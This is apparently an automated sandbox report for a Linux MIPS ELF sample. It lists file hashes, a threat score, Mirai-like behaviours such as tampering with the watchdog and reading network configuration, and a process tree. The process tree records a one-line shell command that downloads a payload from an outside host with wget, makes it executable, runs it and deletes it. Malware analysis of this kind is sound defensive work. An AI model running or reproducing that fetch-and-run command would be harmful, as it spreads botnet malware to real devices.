Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
114s -
max time network
143s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240221-en -
resource tags
-
submitted
22/02/2024, 21:29
General
-
Target
b581921d4bd98e2662e6f3d2bdb93a46.elf
-
Size
155KB
-
MD5
b581921d4bd98e2662e6f3d2bdb93a46
-
SHA1
c13296ea2602116bd39de01a5acb5827b8bd8c92
-
SHA256
98fd5efa1b4c4733aa5e7336a1d5ea718deae7a3e712249d47df3aedf3d13011
-
SHA512
394f6571ea8747fa2893e5850d2a85e551efaf714cdec9a46f0e857e2d17d2b849b50d29f513840caeee5f8e0078a4bbcbd95b31dce8117b78e991a93adb417f
-
SSDEEP
3072:1LNqrhHZ0P6bRFBQipfRjHkLwmrThPaLEne7rNb:1Lsrr0PeRTJrgLwmrThPaLEne7rNb
Score
7/10
Malware Config
Signatures
-
Changes its process name 1 IoCs
-
Executes dropped EXE 1 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/b581921d4bd98e2662e6f3d2bdb93a46.elf/tmp/b581921d4bd98e2662e6f3d2bdb93a46.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."1⤵
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod 777 .....2⤵
-
-
/tmp/....../.....2⤵
- Executes dropped EXE
-
-
/bin/sh/bin/sh ./.....2⤵
-
-
/bin/rmrm -rf .....2⤵
-